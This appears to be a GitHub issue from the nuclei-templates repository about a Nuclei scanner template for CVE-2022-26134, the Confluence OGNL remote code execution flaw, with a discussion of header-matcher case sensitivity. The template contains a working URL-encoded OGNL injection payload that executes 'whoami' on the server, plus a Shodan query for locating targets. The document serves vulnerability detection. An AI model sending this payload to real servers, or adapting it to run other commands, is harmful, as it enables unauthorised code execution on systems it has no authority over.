nuclei-templates
nuclei-templates copied to clipboard
projectdiscovery
CVE-2022-26134
Template Information:
CVE-2022-26134 Confluence - OGNL Remote Code Execution reference: - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - https://jira.atlassian.com/browse/CONFSERVER-79016
Nuclei Template:
id: CVE-2022-26134
info:
name: Confluence - OGNL Remote Code Execution
author: gh0st
severity: critical
description: |
Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26134
cwe-id: CWE-74
metadata:
shodan-query: http.component:"Atlassian Confluence"
verified: "true"
tags: cve,cve2022,confluence,rce,ognl,oast,kev
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "X-Cmd-Response"
Hi team, the currently existing CVE-2022-26134.yaml file is not working properly, I have rewritten this POC and hope it can be updated, thanks.
Hello @BetterDefender, we apologize for the longer-than-usual response time regarding this issue. We appreciate the time and effort you took to create it. The team will review it shortly. Cheers! 🍻
Hi team, the currently existing CVE-2021-24351.yaml file is not working properly, I have rewritten this POC and hope it can be updated, thanks.
Hello @BetterDefender, can you please specify which template you are facing an issue with? because the issue you have created is for the CVE-2022-26134 - Confluence - OGNL Remote Code Execution which is a duplicate of this template. Also, in your above comment you have mentioned the CVE-2021-24351
Sorry, I said the wrong CVE number in my previous reply, the one that needs to be changed is CVE-2022-26134.yaml.
Can you mention the issues you are facing with the current template we have? Surely, we'll help you with that.
Since it's been so long, I'm a bit hard to remember, but the Payload used in the POC for the vulnerability would add X-Cmd-Response to the response header, but when matching it matches lowercase letters, which led to false positives when I was testing the site with the vulnerability, and after modifying the yaml content, the vulnerability was successfully detected.
Hello @BetterDefender, We have tried replicating this issue, and this should not cause any false positive results because the dsl matcher is working as intended by changing the response header matcher into the lower case contains(to_lower(header_1), "x-cmd-response:") and showing the result as expected.
I actually did experience a false alarm for that reason, so I submitted a question about it, and I'll keep you posted if I encounter it again in the future, thanks for the reply!